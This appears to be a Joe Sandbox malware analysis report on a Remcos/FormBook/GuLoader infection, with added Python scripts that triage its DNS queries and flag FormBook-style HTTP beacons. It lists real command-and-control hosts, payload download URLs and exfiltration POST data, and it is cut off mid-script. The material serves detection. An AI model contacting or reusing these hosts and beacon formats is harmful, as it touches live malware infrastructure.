              Source: Network traffic, Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.111.137.132:57484 -> 192.168.2.4:49738
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 5.78.41.174:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 162.241.2.92:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 5.78.41.174:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 162.241.2.92:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 203.161.41.205:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 162.241.2.92:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 5.78.41.174:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 34.149.87.45:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 142.250.186.147:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 5.78.41.174:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 162.241.2.92:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 203.161.41.205:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 64.46.102.70:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 34.149.87.45:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 203.161.41.205:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 34.149.87.45:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 203.161.41.205:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 34.149.87.45:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 142.250.186.147:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 142.250.186.147:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 3.33.130.190:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 142.250.186.147:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80
              Source: unknownDNS query: name: iwarsut775laudrye2.duckdns.org
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 203.161.41.205 203.161.41.205
              Source: Joe Sandbox ViewASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49741 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 193.25.216.165:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.62.202:443
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
              Source: global traffic | HTTP traffic detected: GET /Jouse4.png HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: avocaldoperu.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /Jouse1.png HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: avocaldoperu.com | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /Stevns179.mix HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: cpanel-adminhost.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /wWdnBiepyw166.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: cpanel-adminhost.com | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /wl3e/?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk= HTTP/1.1 | Host: www.ctorq.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X HTTP/1.1 | Host: www.vendasnaweb1.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4= HTTP/1.1 | Host: www.411divorce.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /4d31/?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X HTTP/1.1 | Host: www.gtprivatewealth.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE= HTTP/1.1 | Host: www.katasoo.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X HTTP/1.1 | Host: www.martinminorgroup.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /pbzm/?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s= HTTP/1.1 | Host: www.atlpicsstudios.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU=&8le=9XPp_0_hUrF45X HTTP/1.1 | Host: www.openhandedvision.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global traffic | HTTP traffic detected: GET /r9e8/?8le=9XPp_0_hUrF45X&4NZpb=NZnCwFpZhKq0sQLr3EYC0TyIV0Vt7qzpk8sJXmG0u+Dj16JHvnRy3RCRxkJB+yK1MPAIrV8029hJ5TdoPi+z2c1Lq4bOeIsIUJHbQyiTQ7hpVCcnWmpKoKk= HTTP/1.1 | Host: www.shabygreen.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global traffic | DNS traffic detected: DNS query: avocaldoperu.com
              Source: global traffic | DNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
              Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
              Source: global traffic | DNS traffic detected: DNS query: cpanel-adminhost.com
              Source: global traffic | DNS traffic detected: DNS query: www.ctorq.net
              Source: global traffic | DNS traffic detected: DNS query: www.vendasnaweb1.com
              Source: global traffic | DNS traffic detected: DNS query: www.411divorce.com
              Source: global traffic | DNS traffic detected: DNS query: www.gtprivatewealth.com
              Source: global traffic | DNS traffic detected: DNS query: www.katasoo.com
              Source: global traffic | DNS traffic detected: DNS query: www.martinminorgroup.com
              Source: global traffic | DNS traffic detected: DNS query: www.atlpicsstudios.com
              Source: global traffic | DNS traffic detected: DNS query: www.openhandedvision.com
              Source: global traffic | DNS traffic detected: DNS query: www.shabygreen.top
              Source: global traffic | DNS traffic detected: DNS query: www.kera333.org
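Two of the names above belong to the Remcos stage rather than to FormBook: iwarsut775laudrye2.duckdns.org is a customer subdomain of a free dynamic-DNS provider, and geoplugin.net is the geolocation service whose /json.gp endpoint Remcos queries on start-up. The remaining www.* names are the hosts FormBook rotates through. The script below is an added example and not part of the Joe Sandbox report: it tags each query name, correlates the two Remcos indicators (either alone is common benign traffic), and measures the fan-out of distinct registered domains that the rotation produces. The provider list, the fan-out threshold and the two-label registered-domain shortcut are this example's assumptions; a production version would use the Public Suffix List and a maintained dynamic-DNS feed.

```python
"""Tag and correlate the DNS query names from a sandbox run.

Added example; not part of the Joe Sandbox report. QUERIES is copied from the
report's "DNS traffic detected" entries, in order.
"""

# Assumed, illustrative list of free dynamic-DNS providers; duckdns.org is the
# one seen in this report. In practice this is a maintained data feed.
DYNAMIC_DNS_PROVIDERS = {"duckdns.org", "no-ip.com", "no-ip.org", "ddns.net",
                         "hopto.org", "zapto.org", "dyndns.org"}
GEOIP_SERVICES = {"geoplugin.net"}   # Remcos fetches /json.gp here at start-up
FANOUT_THRESHOLD = 10                # assumed: distinct domains in one run worth a look

QUERIES = [
    "avocaldoperu.com", "iwarsut775laudrye2.duckdns.org", "geoplugin.net",
    "cpanel-adminhost.com", "www.ctorq.net", "www.vendasnaweb1.com",
    "www.411divorce.com", "www.gtprivatewealth.com", "www.katasoo.com",
    "www.martinminorgroup.com", "www.atlpicsstudios.com",
    "www.openhandedvision.com", "www.shabygreen.top", "www.kera333.org",
]


def registered_domain(name: str) -> str:
    """Last two labels of the name. Enough for the providers listed above;
    multi-label public suffixes (co.uk and the like) need the Public Suffix List."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def tag_query(name: str) -> list:
    """Return the indicator tags for one query name."""
    reg = registered_domain(name)
    tags = []
    # Only a subdomain below the provider is a customer host; the apex itself is not.
    if reg in DYNAMIC_DNS_PROVIDERS and name.lower().rstrip(".") != reg:
        tags.append("dynamic-dns")
    if reg in GEOIP_SERVICES:
        tags.append("geoip-lookup")
    return tags


def triage(queries) -> dict:
    """Correlate the tags over a whole run and summarise the domain fan-out."""
    tagged = {q: tag_query(q) for q in queries}
    dynamic = [q for q, tags in tagged.items() if "dynamic-dns" in tags]
    geoip = [q for q, tags in tagged.items() if "geoip-lookup" in tags]
    domains = {registered_domain(q) for q in queries}
    return {
        "dynamic_dns": dynamic,
        "geoip": geoip,
        # Remcos does both shortly after launch; requiring both cuts false positives.
        "remcos_like": bool(dynamic and geoip),
        "distinct_domains": len(domains),
        "high_fanout": len(domains) >= FANOUT_THRESHOLD,
    }


if __name__ == "__main__":
    for query in QUERIES:
        print(f"{query:<34} {' '.join(tag_query(query)) or '-'}")
    print(triage(QUERIES))
```

The fan-out count is the cheap signal here: fourteen distinct registered domains resolved by one process in a few minutes, most of them never seen before on the host, is what the FormBook rotation looks like from DNS alone, before any HTTP content is inspected.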
              Source: unknown | HTTP traffic detected: POST /jk4m/ HTTP/1.1 | Host: www.vendasnaweb1.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Content-Length: 202 | Content-Type: application/x-www-form-urlencoded | Cache-Control: no-cache | Connection: close | Origin: http://www.vendasnaweb1.com | Referer: http://www.vendasnaweb1.com/jk4m/ | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 | Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 34 78 32 78 70 75 4d 43 6c 66 63 72 64 70 4f 6f 4c 6b 4b 65 4b 32 52 78 7a 6c 6d 35 42 49 4f 6c 59 45 33 75 58 2f 70 73 4a 59 54 41 5a 6d 53 41 4d 42 6c 7a 48 31 41 6f 6d 32 35 48 2f 6b 46 4b 74 41 6a 35 65 4c 39 44 49 4b 66 62 71 71 42 50 39 33 2f 76 72 64 59 53 72 43 2b 42 72 63 44 68 74 63 6e 63 44 61 6e 49 39 70 69 77 4f 78 50 63 58 71 66 6e 79 47 48 72 58 42 64 47 69 69 73 78 71 37 31 76 76 4f 55 34 79 6d 6e 44 34 34 65 4d 64 69 2f 4a 67 5a 6b 2f 41 67 6f 44 78 68 6b 5a 7a 63 52 69 4f 33 59 5a 44 32 4e 43 4f 4e 68 6d 70 71 69 72 77 3d 3d | Data Ascii: 4NZpb=LWzjlNPDNkqeO4x2xpuMClfcrdpOoLkKeK2Rxzlm5BIOlYE3uX/psJYTAZmSAMBlzH1Aom25H/kFKtAj5eL9DIKfbqqBP93/vrdYSrC+BrcDhtcncDanI9piwOxPcXqfnyGHrXBdGiisxq71vvOU4ymnD44eMdi/JgZk/AgoDxhkZzcRiO3YZD2NCONhmpqirw==
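The GET requests to www.ctorq.net through www.shabygreen.top and the POST to www.vendasnaweb1.com above share one shape: a four-character directory, a 14-character token (9XPp_0_hUrF45X) that stays constant while the host changes, a long base64-alphabet blob, and the same Chrome/43.0.2357.65 User-Agent on every request. The GuLoader stage fetches (Jouse4.png, Stevns179.mix, wWdnBiepyw166.bin, Firefox/121.0 UA) and the geoplugin lookup (no UA) do not fit it. The script below is an added example, not part of the Joe Sandbox report and not FormBook's own code: it parses raw HTTP requests and flags that shape. The sample requests are constructed from the report's entries with the CRLF header separators restored; the indicator names, the 60-character blob threshold and the requirement that UA, directory shape and blob coincide are this example's assumptions. A match identifies the bot's rotation list, not a confirmed C2 host: FormBook's configuration mixes decoy domains with the live server, and a generic WordPress 404 such as those listed further down does not by itself settle which is which.

```python
"""Shape-based triage of FormBook-style HTTP beacons.

Added example; not part of the Joe Sandbox report and not FormBook code. The
sample requests are constructed from the report's entries (CRLF restored).
"""
import re

# User-Agent carried by every FormBook request in this report. The GuLoader
# stage downloads use a Firefox/121.0 UA and the geoplugin lookup sends none.
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36")
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,"
          "image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7")
DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")              # /wl3e/, /jk4m/, /hxac/ ...
TOKEN_RE = re.compile(r"^[A-Za-z0-9_]{14}$")         # 9XPp_0_hUrF45X, constant per sample
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{60,}={0,2}$")  # base64-alphabet payload; 60 is assumed


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}


def split_form(encoded: str) -> dict:
    """k=v&k=v splitter that leaves '+', '/' and trailing '=' inside values alone
    (urllib.parse.parse_qsl would turn '+' into spaces and defeat BLOB_RE)."""
    params = {}
    for part in filter(None, encoded.split("&")):
        key, _, value = part.partition("=")
        params[key] = value
    return params


def classify(raw: str) -> dict:
    """Tag one request; verdict is formbook-c2 only when UA, directory shape and
    blob occur together, since the UA alone is a weak signal."""
    req = parse_request(raw)
    headers = req["headers"]
    hits = []
    if headers.get("user-agent") == FORMBOOK_UA:
        hits.append("formbook-ua")
    if DIR_RE.match(req["path"]):
        hits.append("4char-dir")
    if req["method"] == "GET":
        params = split_form(req["query"])            # GET carries token and blob in the query
    elif headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params = split_form(req["body"])             # POST carries the blob in the form body
    else:
        params = {}
    values = list(params.values())
    token = next((v for v in values if TOKEN_RE.match(v)), None)
    if token:
        hits.append("14char-token")
    if any(BLOB_RE.match(v) for v in values):
        hits.append("b64-blob")
    verdict = "formbook-c2" if {"formbook-ua", "4char-dir", "b64-blob"} <= set(hits) else "other"
    return {"host": headers.get("host", ""), "method": req["method"],
            "token": token, "hits": hits, "verdict": verdict}


def c2_hosts(raws) -> set:
    """Hosts contacted with the beacon shape: the rotation list, decoys included."""
    return {r["host"] for r in map(classify, raws) if r["verdict"] == "formbook-c2"}


# Constructed from the report's request entries; CRLF separators restored.
FORMBOOK_GET = (
    "GET /wl3e/?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk= HTTP/1.1\r\n"
    f"Host: www.ctorq.net\r\nAccept: {ACCEPT}\r\nAccept-Language: en-US,en;q=0.9\r\n"
    f"Connection: close\r\nUser-Agent: {FORMBOOK_UA}\r\n\r\n")
FORMBOOK_POST = (
    "POST /jk4m/ HTTP/1.1\r\nHost: www.vendasnaweb1.com\r\n"
    f"Accept: {ACCEPT}\r\nAccept-Language: en-US,en;q=0.9\r\nAccept-Encoding: gzip, deflate, br\r\n"
    "Content-Length: 202\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "Cache-Control: no-cache\r\nConnection: close\r\nOrigin: http://www.vendasnaweb1.com\r\n"
    f"Referer: http://www.vendasnaweb1.com/jk4m/\r\nUser-Agent: {FORMBOOK_UA}\r\n\r\n"
    "4NZpb=LWzjlNPDNkqeO4x2xpuMClfcrdpOoLkKeK2Rxzlm5BIOlYE3uX/psJYTAZmSAMBlzH1Aom25H/kFKtAj5eL9DIKfbqqBP93/vrdYSrC+BrcDhtcncDanI9piwOxPcXqfnyGHrXBdGiisxq71vvOU4ymnD44eMdi/JgZk/AgoDxhkZzcRiO3YZD2NCONhmpqirw==")
GULOADER_GET = (
    "GET /Jouse4.png HTTP/1.1\r\n"
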